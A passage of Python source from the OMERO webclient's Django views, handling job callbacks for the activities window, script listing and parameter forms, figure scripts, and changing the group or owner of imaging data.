S/P, FileAnnotation etc. used to display results from the scripting
service
E.g webclient/userdata/?path=image-12601
If the object is a file annotation, try to browse to the parent P/D/I
"""
base_url = reverse(viewname="load_template", args=["userdata"])
# if we have a File Annotation, then we want our URL to be for the parent
# object...
if isinstance(obj, omero.model.FileAnnotationI):
fa = conn.getObject("Annotation", obj.id.val)
for ptype in ["project", "dataset", "image"]:
links = list(fa.getParentLinks(ptype))
if len(links) > 0:
obj = links[0].parent
break
if obj.__class__.__name__ in (
"ImageI",
"DatasetI",
"ProjectI",
"ScreenI",
"PlateI",
"WellI",
):
otype = obj.__class__.__name__[:-1].lower()
base_url += "?show=%s-%s" % (otype, obj.id.val)
return base_url
######################
# Activities window & Progressbar
def update_callback(request, cbString, **kwargs):
"""Update a callback handle with key/value pairs"""
for key, value in kwargs.items():
request.session["callback"][cbString][key] = value
@login_required()
@render_response()
def activities(request, conn=None, **kwargs):
"""
This refreshes callback handles (delete, scripts, chgrp etc) and provides
html to update Activities window & Progressbar.
The returned html contains details for ALL callbacks in web session,
regardless of their status.
We also add counts of jobs, failures and 'in progress' to update status
bar.
"""
in_progress = 0
failure = 0
new_results = []
_purgeCallback(request)
# If we have a jobId (not added to request.session) just process it...
# ONLY used for chgrp/chown dry-run.
jobId = request.GET.get("jobId", None)
if jobId is not None:
jobId = str(jobId)
try:
prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
status = prx.getStatus()
logger.debug("job status: %s", status)
rsp = prx.getResponse()
if rsp is not None:
rv = graphResponseMarshal(conn, rsp)
rv["finished"] = True
else:
rv = {"finished": False}
rv["status"] = {
"currentStep": status.currentStep,
"steps": status.steps,
"startTime": status.startTime,
"stopTime": status.stopTime,
}
except IceException:
rv = {"finished": True}
return rv
elif request.method == "DELETE":
try:
json_data = json.loads(request.body)
except TypeError:
# for Python 3.5
json_data = json.loads(bytes_to_native_str(request.body))
jobId = json_data.get("jobId", None)
if jobId is not None:
jobId = str(jobId)
rv = {"jobId": jobId}
try:
prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
status = prx.getStatus()
logger.debug("pre-cancel() job status: %s", status)
rv["status"] = {
"currentStep": status.currentStep,
"steps": status.steps,
"startTime": status.startTime,
"stopTime": status.stopTime,
}
prx.cancel()
except omero.LockTimeout:
# expected that it will take > 5 seconds to cancel
logger.info("Timeout on prx.cancel()")
return rv
# test each callback for failure, errors, completion, results etc
for cbString in request.session.get("callback").keys():
callbackDict = request.session["callback"][cbString]
job_type = callbackDict["job_type"]
status = callbackDict["status"]
if status == "failed":
failure += 1
request.session.modified = True
# update chgrp / chown
if job_type in ("chgrp", "chown"):
if status not in ("failed", "finished"):
rsp = None
try:
prx = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString)
)
rsp = prx.getResponse()
close_handle = False
try:
# if response is None, then we're still in progress,
# otherwise...
if rsp is not None:
close_handle = True
new_results.append(cbString)
if isinstance(rsp, omero.cmd.ERR):
rsp_params = ", ".join(
[
"%s: %s" % (k, v)
for k, v in rsp.parameters.items()
]
)
logger.error(
"%s failed with: %s" % (job_type, rsp_params)
)
update_callback(
request,
cbString,
status="failed",
report="%s %s" % (rsp.name, rsp_params),
error=1,
)
elif isinstance(rsp, omero.cmd.OK):
update_callback(request, cbString, status="finished")
else:
in_progress += 1
finally:
prx.close(close_handle)
except Exception:
logger.info(
"Activities %s handle not found: %s" % (job_type, cbString)
)
continue
elif job_type == "send_email":
if status not in ("failed", "finished"):
rsp = None
try:
prx = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString)
)
callback = omero.callbacks.CmdCallbackI(
conn.c, prx, foreground_poll=True
)
rsp = callback.getResponse()
close_handle = False
try:
# if response is None, then we're still in progress,
# otherwise...
if rsp is not None:
close_handle = True
new_results.append(cbString)
if isinstance(rsp, omero.cmd.ERR):
rsp_params = ", ".join(
[
"%s: %s" % (k, v)
for k, v in rsp.parameters.items()
]
)
logger.error("send_email failed with: %s" % rsp_params)
update_callback(
request,
cbString,
status="failed",
report={"error": rsp_params},
error=1,
)
else:
total = (
rsp.success
+ len(rsp.invalidusers)
+ len(rsp.invalidemails)
)
update_callback(
request,
cbString,
status="finished",
rsp={"success": rsp.success, "total": total},
)
if (
len(rsp.invalidusers) > 0
or len(rsp.invalidemails) > 0
):
invalidusers = [
e.getFullName()
for e in list(
conn.getObjects(
"Experimenter", rsp.invalidusers
)
)
]
update_callback(
request,
cbString,
report={
"invalidusers": invalidusers,
"invalidemails": rsp.invalidemails,
},
)
else:
in_progress += 1
finally:
callback.close(close_handle)
except Exception:
logger.error(traceback.format_exc())
logger.info("Activities send_email handle not found: %s" % cbString)
# update delete
elif job_type == "delete":
if status not in ("failed", "finished"):
try:
handle = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString)
)
cb = omero.callbacks.CmdCallbackI(
conn.c, handle, foreground_poll=True
)
rsp = cb.getResponse()
close_handle = False
try:
if not rsp: # Response not available
update_callback(
request,
cbString,
error=0,
status="in progress",
dreport=_formatReport(handle),
)
in_progress += 1
else: # Response available
close_handle = True
new_results.append(cbString)
rsp = cb.getResponse()
err = isinstance(rsp, omero.cmd.ERR)
if err:
update_callback(
request,
cbString,
error=1,
status="failed",
dreport=_formatReport(handle),
)
failure += 1
else:
update_callback(
request,
cbString,
error=0,
status="finished",
dreport=_formatReport(handle),
)
finally:
cb.close(close_handle)
except Ice.ObjectNotExistException:
update_callback(
request, cbString, error=0, status="finished", dreport=None
)
except Exception as x:
logger.error(traceback.format_exc())
logger.error("Status job '%s'error:" % cbString)
update_callback(
request, cbString, error=1, status="failed", dreport=str(x)
)
failure += 1
# update scripts
elif job_type == "script":
# if error on runScript, the cbString is not a ProcessCallback...
if not cbString.startswith("ProcessCallback"):
continue # ignore
if status not in ("failed", "finished"):
logger.info("Check callback on script: %s" % cbString)
try:
proc = omero.grid.ScriptProcessPrx.checkedCast(
conn.c.ic.stringToProxy(cbString)
)
except IceException:
update_callback(
request,
cbString,
status="failed",
Message="No process found for job",
error=1,
)
continue
cb = omero.scripts.ProcessCallbackI(conn.c, proc)
# check if we get something back from the handle...
if cb.block(0): # ms.
cb.close()
try:
# we can only retrieve this ONCE - must save results
results = proc.getResults(0, conn.SERVICE_OPTS)
update_callback(request, cbString, status="finished")
new_results.append(cbString)
except Exception:
update_callback(
request,
cbString,
status="finished",
Message="Failed to get results",
)
logger.info("Failed on proc.getResults() for OMERO.script")
continue
# value could be rstring, rlong, robject
rMap = {}
for key, value in results.items():
v = value.getValue()
if key in ("stdout", "stderr", "Message"):
if key in ("stderr", "stdout"):
# just save the id of original file
v = v.id.val
update_kwargs = {key: v}
update_callback(request, cbString, **update_kwargs)
else:
if hasattr(v, "id"):
# do we have an object (ImageI,
# FileAnnotationI etc)
obj_data = {
"id": v.id.val,
"type": v.__class__.__name__[:-1],
}
obj_data["browse_url"] = getObjectUrl(conn, v)
if v.isLoaded() and hasattr(v, "file"):
# try:
mimetypes = {
"image/png": "png",
"image/jpeg": "jpeg",
"text/plain": "text",
}
if v.file.mimetype.val in mimetypes:
obj_data["fileType"] = mimetypes[
v.file.mimetype.val
]
obj_data["fileId"] = v.file.id.val
obj_data["name"] = v.file.name.val
# except Exception:
# pass
if v.isLoaded() and hasattr(v, "name"):
# E.g Image, OriginalFile etc
name = unwrap(v.name)
if name is not None:
# E.g. FileAnnotation has null name
obj_data["name"] = name
rMap[key] = obj_data
else:
rMap[key] = unwrap(v)
update_callback(request, cbString, results=rMap)
else:
in_progress += 1
# having updated the request.session, we can now prepare the data for http
# response
rv = {}
for cbString in request.session.get("callback").keys():
# make a copy of the map in session, so that we can replace non
# json-compatible objects, without modifying session
rv[cbString] = copy.copy(request.session["callback"][cbString])
# return json (used for testing)
if "template" in kwargs and kwargs["template"] == "json":
for cbString in request.session.get("callback").keys():
rv[cbString]["start_time"] = str(
request.session["callback"][cbString]["start_time"]
)
rv["inprogress"] = in_progress
rv["failure"] = failure
rv["jobs"] = len(request.session["callback"])
return JsonResponse(rv) # json
jobs = []
new_errors = False
for key, data in rv.items():
# E.g. key: ProcessCallback/39f77932-c447-40d8-8f99-910b5a531a25 -t:tcp -h 10.211.55.2 -p 54727:tcp -h 10.37.129.2 -p 54727:tcp -h 10.12.2.21 -p 54727 # noqa
# create id we can use as html id,
# E.g. 39f77932-c447-40d8-8f99-910b5a531a25
if len(key.split(" ")) > 0:
htmlId = key.split(" ")[0]
if len(htmlId.split("/")) > 1:
htmlId = htmlId.split("/")[1]
rv[key]["id"] = htmlId
rv[key]["key"] = key
if key in new_results:
rv[key]["new"] = True
if "error" in data and data["error"] > 0:
new_errors = True
jobs.append(rv[key])
jobs.sort(key=lambda x: x["start_time"], reverse=True)
context = {
"sizeOfJobs": len(request.session["callback"]),
"jobs": jobs,
"inprogress": in_progress,
"new_results": len(new_results),
"new_errors": new_errors,
"failure": failure,
}
context["template"] = "webclient/activities/activitiesContent.html"
return context
@login_required()
def activities_update(request, action, **kwargs):
"""
If the above 'action' == 'clean' then we clear jobs from
request.session['callback'] either a single job (if 'jobKey' is specified
in POST) or all jobs (apart from those in progress)
"""
request.session.modified = True
if action == "clean":
if "jobKey" in request.POST:
jobId = request.POST.get("jobKey")
rv = {}
if jobId in request.session["callback"]:
del request.session["callback"][jobId]
request.session.modified = True
rv["removed"] = True
else:
rv["removed"] = False
return JsonResponse(rv)
else:
jobs = list(request.session["callback"].items())
for key, data in jobs:
if data["status"] != "in progress":
del request.session["callback"][key]
return HttpResponse("OK")
##############################################################################
# User Photo
@login_required()
def avatar(request, oid=None, conn=None, **kwargs):
"""Returns the experimenter's photo"""
photo = conn.getExperimenterPhoto(oid)
return HttpResponse(photo, content_type="image/jpeg")
##############################################################################
# webgateway extention
@login_required()
def image_viewer(request, iid, share_id=None, **kwargs):
"""Delegates to webgateway, using share connection if appropriate"""
kwargs["viewport_server"] = (
share_id is not None and reverse("webindex") + share_id or reverse("webindex")
)
# remove any trailing slash
kwargs["viewport_server"] = kwargs["viewport_server"].rstrip("/")
return webgateway_views.full_viewer(request, iid, **kwargs)
##############################################################################
# scripting service....
@login_required()
@render_response()
def list_scripts(request, conn=None, **kwargs):
"""
List the available scripts - Just officical scripts for now
If all scripts are under a single top-level directory, this is
removed by default. To prevent this, use ?full_path=true
"""
scriptService = conn.getScriptService()
scripts = scriptService.getScripts()
# group scripts into 'folders' (path), named by parent folder name
scriptMenu = {}
scripts_to_ignore = (
request.session.get("server_settings", {})
.get("scripts_to_ignore", "")
.split(",")
)
for s in scripts:
scriptId = s.id.val
path = s.path.val
name = s.name.val
fullpath = os.path.join(path, name)
if fullpath in scripts_to_ignore:
logger.info("Ignoring script %r" % fullpath)
continue
# We want to build a hierarchical <ul> <li> structure
# Each <ul> is a {}, each <li> is either a script 'name': <id> or
# directory 'name': {ul}
ul = scriptMenu
dirs = fullpath.split(os.path.sep)
for li, d in enumerate(dirs):
if len(d) == 0:
continue
if d not in ul:
# if last component in path:
if li + 1 == len(dirs):
ul[d] = scriptId
else:
ul[d] = {}
ul = ul[d]
# convert <ul> maps into lists and sort
def ul_to_list(ul):
dir_list = []
for name, value in ul.items():
if isinstance(value, dict):
# value is a directory
dir_list.append({"name": name, "ul": ul_to_list(value)})
else:
dir_list.append({"name": name, "id": value})
dir_list.sort(key=lambda x: x["name"].lower())
return dir_list
scriptList = ul_to_list(scriptMenu)
# If we have a single top-level directory, we can skip it
if not request.GET.get("full_path") and len(scriptList) == 1:
scriptList = scriptList[0]["ul"]
return scriptList
@login_required()
@render_response()
def script_ui(request, scriptId, conn=None, **kwargs):
"""
Generates an html form for the parameters of a defined script.
"""
scriptService = conn.getScriptService()
try:
params = scriptService.getParams(long(scriptId))
except Exception as ex:
if ex.message.lower().startswith("no processor available"):
return {
"template": "webclient/scripts/no_processor.html",
"scriptId": scriptId,
}
raise ex
if params is None:
return HttpResponse()
paramData = {}
paramData["id"] = long(scriptId)
paramData["name"] = params.name.replace("_", " ")
paramData["description"] = params.description
paramData["authors"] = ", ".join([a for a in params.authors])
paramData["contact"] = params.contact
paramData["version"] = params.version
paramData["institutions"] = ", ".join([i for i in params.institutions])
inputs = [] # use a list so we can sort by 'grouping'
Data_TypeParam = None
IDsParam = None
for key, param in params.inputs.items():
i = {}
i["name"] = key.replace("_", " ")
i["key"] = key
if not param.optional:
i["required"] = True
i["description"] = param.description
if param.min:
i["min"] = str(param.min.getValue())
if param.max:
i["max"] = str(param.max.getValue())
if param.values:
i["options"] = [v.getValue() for v in param.values.getValue()]
if param.useDefault:
i["default"] = unwrap(param.prototype)
if isinstance(i["default"], omero.model.IObject):
i["default"] = None
pt = unwrap(param.prototype)
if pt.__class__.__name__ == "dict":
i["map"] = True
elif pt.__class__.__name__ == "list":
i["list"] = True
if "default" in i:
i["default"] = ",".join([str(d) for d in i["default"]])
elif isinstance(pt, bool):
i["boolean"] = True
elif isinstance(pt, int) or isinstance(pt, long):
# will stop the user entering anything other than numbers.
i["number"] = "number"
elif isinstance(pt, float):
i["number"] = "float"
# if we got a value for this key in the page request, use this as
# default
if request.GET.get(key, None) is not None:
i["default"] = request.GET.get(key, None)
# E.g "" (string) or [0] (int list) or 0.0 (float)
i["prototype"] = unwrap(param.prototype)
i["grouping"] = param.grouping
inputs.append(i)
if key == "IDs":
IDsParam = i # remember these...
if key == "Data_Type":
Data_TypeParam = i
inputs.sort(key=lambda i: i["grouping"])
# if we have Data_Type param - use the request parameters to populate IDs
if (
Data_TypeParam is not None
and IDsParam is not None
and "options" in Data_TypeParam
):
IDsParam["default"] = ""
for dtype in Data_TypeParam["options"]:
if request.GET.get(dtype, None) is not None:
Data_TypeParam["default"] = dtype
IDsParam["default"] = request.GET.get(dtype, "")
break # only use the first match
# if we've not found a match, check whether we have "Well" selected
if len(IDsParam["default"]) == 0 and request.GET.get("Well", None) is not None:
if "Image" in Data_TypeParam["options"]:
wellIds = [long(j) for j in request.GET.get("Well", None).split(",")]
wellIdx = 0
try:
wellIdx = int(request.GET.get("Index", 0))
except Exception:
pass
wells = conn.getObjects("Well", wellIds)
imgIds = [str(w.getImage(wellIdx).getId()) for w in wells]
Data_TypeParam["default"] = "Image"
IDsParam["default"] = ",".join(imgIds)
# try to determine hierarchies in the groupings - ONLY handle 1 hierarchy
# level now (not recursive!)
for i in range(len(inputs)):
if len(inputs) <= i:
# we may remove items from inputs as we go - need to check
break
param = inputs[i]
grouping = param["grouping"] # E.g 03
param["children"] = list()
while len(inputs) > i + 1:
nextGrp = inputs[i + 1]["grouping"] # E.g. 03.1
if nextGrp.split(".")[0] == grouping:
param["children"].append(inputs[i + 1])
inputs.pop(i + 1)
else:
break
paramData["inputs"] = inputs
return {
"template": "webclient/scripts/script_ui.html",
"paramData": paramData,
"scriptId": scriptId,
}
@login_required()
@render_response()
def figure_script(request, scriptName, conn=None, **kwargs):
"""
Show a UI for running figure scripts
"""
imageIds = request.GET.get("Image", None) # comma - delimited list
datasetIds = request.GET.get("Dataset", None)
wellIds = request.GET.get("Well", None)
if wellIds is not None:
wellIds = [long(i) for i in wellIds.split(",")]
wells = conn.getObjects("Well", wellIds)
wellIdx = getIntOrDefault(request, "Index", 0)
imageIds = [str(w.getImage(wellIdx).getId()) for w in wells]
imageIds = ",".join(imageIds)
if imageIds is None and datasetIds is None:
return HttpResponse(
"Need to specify /?Image=1,2 or /?Dataset=1,2 or /?Well=1,2"
)
def validateIds(dtype, ids):
ints = [int(oid) for oid in ids.split(",")]
validObjs = {}
for obj in conn.getObjects(dtype, ints):
validObjs[obj.id] = obj
filteredIds = [iid for iid in ints if iid in validObjs.keys()]
if len(filteredIds) == 0:
raise Http404("No %ss found with IDs %s" % (dtype, ids))
else:
# Now we can specify group context - All should be same group
gid = list(validObjs.values())[0].getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(gid)
return filteredIds, validObjs
context = {}
if imageIds is not None:
imageIds, validImages = validateIds("Image", imageIds)
context["idString"] = ",".join([str(i) for i in imageIds])
context["dtype"] = "Image"
if datasetIds is not None:
datasetIds, validDatasets = validateIds("Dataset", datasetIds)
context["idString"] = ",".join([str(i) for i in datasetIds])
context["dtype"] = "Dataset"
if scriptName == "SplitView":
scriptPath = "/omero/figure_scripts/Split_View_Figure.py"
template = "webclient/scripts/split_view_figure.html"
# Lookup Tags & Datasets (for row labels)
imgDict = [] # A list of data about each image.
for iId in imageIds:
data = {"id": iId}
img = validImages[iId]
data["name"] = img.getName()
tags = [
ann.getTextValue()
for ann in img.listAnnotations()
if ann._obj.__class__ == omero.model.TagAnnotationI
]
data["tags"] = tags
data["datasets"] = [d.getName() for d in img.listParents()]
imgDict.append(data)
# Use the first image as a reference
image = validImages[imageIds[0]]
context["imgDict"] = imgDict
context["image"] = image
context["channels"] = image.getChannels()
elif scriptName == "Thumbnail":
scriptPath = "/omero/figure_scripts/Thumbnail_Figure.py"
template = "webclient/scripts/thumbnail_figure.html"
def loadImageTags(imageIds):
tagLinks = conn.getAnnotationLinks("Image", parent_ids=imageIds)
linkMap = {} # group tags. {imageId: [tags]}
tagMap = {}
for iId in imageIds:
linkMap[iId] = []
for link in tagLinks:
c = link.getChild()
if c._obj.__class__ == omero.model.TagAnnotationI:
tagMap[c.id] = c
linkMap[link.getParent().id].append(c)
imageTags = []
for iId in imageIds:
imageTags.append({"id": iId, "tags": linkMap[iId]})
tags = []
for tId, t in tagMap.items():
tags.append(t)
return imageTags, tags
thumbSets = [] # multiple collections of images
tags = []
figureName = "Thumbnail_Figure"
if datasetIds is not None:
for d in conn.getObjects("Dataset", datasetIds):
imgIds = [i.id for i in d.listChildren()]
imageTags, ts = loadImageTags(imgIds)
thumbSets.append({"name": d.getName(), "imageTags": imageTags})
tags.extend(ts)
figureName = thumbSets[0]["name"]
else:
imageTags, ts = loadImageTags(imageIds)
thumbSets.append({"name": "images", "imageTags": imageTags})
tags.extend(ts)
parent = conn.getObject("Image", imageIds[0]).getParent()
figureName = parent.getName() or "Thumbnail Figure"
context["parent_id"] = parent.getId()
uniqueTagIds = set() # remove duplicates
uniqueTags = []
for t in tags:
if t.id not in uniqueTagIds:
uniqueTags.append(t)
uniqueTagIds.add(t.id)
uniqueTags.sort(key=lambda x: x.getTextValue().lower())
context["thumbSets"] = thumbSets
context["tags"] = uniqueTags
context["figureName"] = figureName.replace(" ", "_")
elif scriptName == "MakeMovie":
scriptPath = "/omero/export_scripts/Make_Movie.py"
template = "webclient/scripts/make_movie.html"
# expect to run on a single image at a time
image = conn.getObject("Image", imageIds[0])
# remove extension (if 3 chars or less)
movieName = image.getName().rsplit(".", 1)
if len(movieName) > 1 and len(movieName[1]) > 3:
movieName = ".".join(movieName)
else:
movieName = movieName[0]
# make sure name is not a path
context["movieName"] = os.path.basename(movieName)
chs = []
for c in image.getChannels():
chs.append(
{
"active": c.isActive(),
"color": c.getColor().getHtml(),
"label": c.getLabel(),
}
)
context["channels"] = chs
context["sizeT"] = image.getSizeT()
context["sizeZ"] = image.getSizeZ()
scriptService = conn.getScriptService()
scriptId = scriptService.getScriptID(scriptPath)
if scriptId < 0:
raise AttributeError("No script found for path '%s'" % scriptPath)
context["template"] = template
context["scriptId"] = scriptId
return context
@login_required()
@render_response()
def fileset_check(request, action, conn=None, **kwargs):
"""
Check whether Images / Datasets etc contain partial Multi-image filesets.
Used by chgrp or delete dialogs to test whether we can perform this
'action'.
"""
dtypeIds = {}
for dtype in ("Image", "Dataset", "Project"):
ids = request.GET.get(dtype, None)
if ids is not None:
dtypeIds[dtype] = [int(i) for i in ids.split(",")]
splitFilesets = conn.getContainerService().getImagesBySplitFilesets(
dtypeIds, None, conn.SERVICE_OPTS
)
splits = []
for fsId, splitIds in splitFilesets.items():
splits.append(
{
"id": fsId,
"attempted_iids": splitIds[True],
"blocking_iids": splitIds[False],
}
)
context = {"split_filesets": splits}
context["action"] = action
if action == "chgrp":
context["action"] = "move"
context["template"] = "webclient/activities/" "fileset_check_dialog_content.html"
return context
def getAllObjects(
conn, project_ids, dataset_ids, image_ids, screen_ids, plate_ids, experimenter_id
):
"""
Given a list of containers and images, calculate all the descendants
and necessary siblings (for any filesets)
"""
# TODO Handle None inputs, maybe add defaults
params = omero.sys.ParametersI()
qs = conn.getQueryService()
project_ids = set(project_ids)
dataset_ids = set(dataset_ids)
image_ids = set(image_ids)
fileset_ids = set([])
plate_ids = set(plate_ids)
screen_ids = set(screen_ids)
# Get any datasets for projects
if project_ids:
params.map = {}
params.map["pids"] = rlist([rlong(x) for x in list(project_ids)])
q = """
select pdlink.child.id
from ProjectDatasetLink pdlink
where pdlink.parent.id in (:pids)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
dataset_ids.add(e[0].val)
# Get any plates for screens
if screen_ids:
params.map = {}
params.map["sids"] = rlist([rlong(x) for x in screen_ids])
q = """
select splink.child.id
from ScreenPlateLink splink
where splink.parent.id in (:sids)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
plate_ids.add(e[0].val)
# Get any images for datasets
if dataset_ids:
params.map = {}
params.map["dids"] = rlist([rlong(x) for x in dataset_ids])
q = """
select dilink.child.id,
dilink.child.fileset.id
from DatasetImageLink dilink
where dilink.parent.id in (:dids)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Some images in Dataset may not have fileset
if e[1] is not None:
fileset_ids.add(e[1].val)
# Get any images for plates
# TODO Seemed no need to add the filesets for plates as it isn't possible
# to link it from outside of its plate. This may be true for the client,
# but it certainly isn't true for the model so maybe allow this to also get
# filesets
if plate_ids:
params.map = {}
params.map["plids"] = rlist([rlong(x) for x in plate_ids])
q = """
select ws.image.id
from WellSample ws
join ws.plateAcquisition pa
where pa.plate.id in (:plids)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Get any extra images due to filesets
if fileset_ids:
params.map = {}
params.map["fsids"] = rlist([rlong(x) for x in fileset_ids])
q = """
select image.id
from Image image
left outer join image.datasetLinks dilink
where image.fileset.id in (select fs.id
from Image im
join im.fileset fs
where fs.id in (:fsids)
group by fs.id
having count(im.id)>1)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Get any additional datasets that may need updating as their children have
# been snatched.
# TODO Need to differentiate which orphaned directories need refreshing
extra_dataset_ids = set([])
extra_orphaned = False
if image_ids:
params.map = {
"iids": rlist([rlong(x) for x in image_ids]),
}
exclude_datasets = ""
if dataset_ids:
params.map["dids"] = rlist([rlong(x) for x in dataset_ids])
# Make sure to allow parentless results as well as those
# that do not match a dataset being removed
exclude_datasets = """
and (
dilink.parent.id not in (:dids)
or dilink.parent.id = null
)
"""
q = (
"""
select distinct dilink.parent.id
from Image image
left outer join image.datasetLinks dilink
where image.id in (:iids)
%s
and (select count(dilink2.child.id)
from DatasetImageLink dilink2
where dilink2.parent.id = dilink.parent.id
and dilink2.child.id not in (:iids)) = 0
"""
% exclude_datasets
)
for e in qs.projection(q, params, conn.SERVICE_OPTS):
if e:
extra_dataset_ids.add(e[0].val)
else:
extra_orphaned = True
# Get any additional projects that may need updating as their children have
# been snatched. There is no need to check for orphans because if a dataset
# is being removed from somewhere else, it can not exist as an orphan.
extra_project_ids = set([])
if dataset_ids:
params.map = {"dids": rlist([rlong(x) for x in dataset_ids])}
exclude_projects = ""
if project_ids:
params.map["pids"] = rlist([rlong(x) for x in project_ids])
exclude_projects = "and pdlink.parent.id not in (:pids)"
q = (
"""
select distinct pdlink.parent.id
from ProjectDatasetLink pdlink
where pdlink.child.id in (:dids)
%s
and (select count(pdlink2.child.id)
from ProjectDatasetLink pdlink2
where pdlink2.parent.id = pdlink.parent.id
and pdlink2.child.id not in (:dids)) = 0
"""
% exclude_projects
)
for e in qs.projection(q, params, conn.SERVICE_OPTS):
extra_project_ids.add(e[0].val)
# We now have the complete list of objects that will change group
# We also have an additional list of datasets/projects that may have had
# snatched children and thus may need updating in the client if the
# dataset/project has gone from N to 0 children
result = {
# These objects are completely removed
"remove": {
"project": list(project_ids),
"dataset": list(dataset_ids),
"screen": list(screen_ids),
"plate": list(plate_ids),
"image": list(image_ids),
},
# These objects now have no children
"childless": {
"project": list(extra_project_ids),
"dataset": list(extra_dataset_ids),
"orphaned": extra_orphaned,
},
}
return result
@require_POST
@login_required()
def chgrpDryRun(request, conn=None, **kwargs):
return dryRun(request, action="chgrp", conn=conn, **kwargs)
@require_POST
@login_required()
def dryRun(request, action, conn=None, **kwargs):
"""Submit chgrp or chown dry-run"""
targetObjects = {}
dtypes = ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]
for dtype in dtypes:
oids = request.POST.get(dtype, None)
if oids is not None:
obj_ids = [int(oid) for oid in oids.split(",")]
targetObjects[dtype] = obj_ids
if action == "chgrp":
target_id = getIntOrDefault(request, "group_id", None)
elif action == "chown":
target_id = getIntOrDefault(request, "owner_id", None)
handle = conn.submitDryRun(action, targetObjects, target_id)
jobId = str(handle)
return HttpResponse(jobId)
@login_required()
def chgrp(request, conn=None, **kwargs):
"""
Moves data to a new group, using the chgrp queue.
Handles submission of chgrp form: all data in POST.
Adds the callback handle to the request.session['callback']['jobId']
"""
if not request.method == "POST":
return JsonResponse({"Error": "Need to POST to chgrp"}, status=405)
# Get the target group_id
group_id = getIntOrDefault(request, "group_id", None)
if group_id is None:
return JsonResponse({"Error": "chgrp: No group_id specified"})
group_id = long(group_id)
def getObjectOwnerId(r):
for t in ["Dataset", "Image", "Plate"]:
ids = r.POST.get(t, None)
if ids is not None:
for o in list(conn.getObjects(t, ids.split(","))):
return o.getDetails().owner.id.val
group = conn.getObject("ExperimenterGroup", group_id)
new_container_name = request.POST.get("new_container_name", None)
new_container_type = request.POST.get("new_container_type", None)
container_id = None
# Context must be set to owner of data, E.g. to create links.
ownerId = getObjectOwnerId(request)
conn.SERVICE_OPTS.setOmeroUser(ownerId)
if (
new_container_name is not None
and len(new_container_name) > 0
and new_container_type is not None
):
conn.SERVICE_OPTS.setOmeroGroup(group_id)
container_id = conn.createContainer(new_container_type, new_container_name)
# No new container, check if target is specified
if container_id is None:
# E.g. "dataset-234"
target_id = request.POST.get("target_id", None)
container_id = target_id is not None and target_id.split("-")[1] or None
dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
for dtype in dtypes:
# Get all requested objects of this type
oids = request.POST.get(dtype, None)
if oids is not None:
obj_ids = [int(oid) for oid in oids.split(",")]
# TODO Doesn't the filesets only apply to images?
# if 'filesets' are specified, make sure we move ALL Fileset Images
fsIds = request.POST.getlist("fileset")
if len(fsIds) > 0:
# If a dataset is being moved and there is a split fileset
# then those images need to go somewhere in the new
if dtype == "Dataset":
conn.regroupFilesets(dsIds=obj_ids, fsIds=fsIds)
else:
for fs in conn.getObjects("Fileset", fsIds):
obj_ids.extend([i.id for i in fs.copyImages()])
obj_ids = list(set(obj_ids)) # remove duplicates
logger.debug("chgrp to group:%s %s-%s" % (group_id, dtype, obj_ids))
handle = conn.chgrpObjects(dtype, obj_ids, group_id, container_id)
jobId = str(handle)
request.session["callback"][jobId] = {
"job_type": "chgrp",
"group": group.getName(),
"to_group_id": group_id,
"dtype": dtype,
"obj_ids": obj_ids,
"job_name": "Change group",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
request.session.modified = True
# Update contains a list of images/containers that need to be
# updated.
project_ids = request.POST.get("Project", [])
dataset_ids = request.POST.get("Dataset", [])
image_ids = request.POST.get("Image", [])
screen_ids = request.POST.get("Screen", [])
plate_ids = request.POST.get("Plate", [])
if project_ids:
project_ids = [long(x) for x in project_ids.split(",")]
if dataset_ids:
dataset_ids = [long(x) for x in dataset_ids.split(",")]
if image_ids:
image_ids = [long(x) for x in image_ids.split(",")]
if screen_ids:
screen_ids = [long(x) for x in screen_ids.split(",")]
if plate_ids:
plate_ids = [long(x) for x in plate_ids.split(",")]
# TODO Change this user_id to be an experimenter_id in the request as it
# is possible that a user is chgrping data from another user so it is
# that users orphaned that will need updating. Or maybe all orphaned
# directories could potentially need updating?
# Create a list of objects that have been changed by this operation. This
# can be used by the client to visually update.
update = getAllObjects(
conn,
project_ids,
dataset_ids,
image_ids,
screen_ids,
plate_ids,
request.session.get("user_id"),
)
# return HttpResponse("OK")
return JsonResponse({"update": update})
@login_required()
def chown(request, conn=None, **kwargs):
"""
Moves data to a new owner, using the chown queue.
Handles submission of chown form: all data in POST.
Adds the callback handle to the request.session['callback']['jobId']
"""
if not request.method == "POST":
return JsonResponse({"Error": "Need to POST to chown"}, status=405)
# Get the target owner_id
owner_id = getIntOrDefault(request, "owner_id", None)
if owner_id is None:
return JsonResponse({"Error": "chown: No owner_id specified"})
owner_id = int(owner_id)
exp = conn.getObject("Experimenter", owner_id)
if exp is None:
return JsonResponse({"Error": "chown: Experimenter not found" % owner_id})
dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
jobIds = []
for dtype in dtypes:
# Get all requested objects of this type
oids = request.POST.get(dtype, None)
if oids is not None:
obj_ids = [int(oid) for oid in oids.split(",")]
logger.debug("chown to owner:%s %s-%s" % (owner_id, dtype, obj_ids))
handle = conn.chownObjects(dtype, obj_ids, owner_id)
jobId = str(handle)
jobIds.append(jobId)
request.session["callback"][jobId] = {
"job_type": "chown",
"owner": exp.getFullName(),
"to_owner_id": owner_id,
"dtype": dtype,
"obj_ids": obj_ids,
"job_name": "Change owner",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
request.session.modified = True
return JsonResponse({"jobIds": jobIds})
@login_required(setGroupContext=True)
def script_run(request, scriptId, conn=None, **kwargs):
"""
Runs a script using values in a POST
"""
scriptService = conn.getScriptService()
inputMap = {}
sId = long(scriptId)
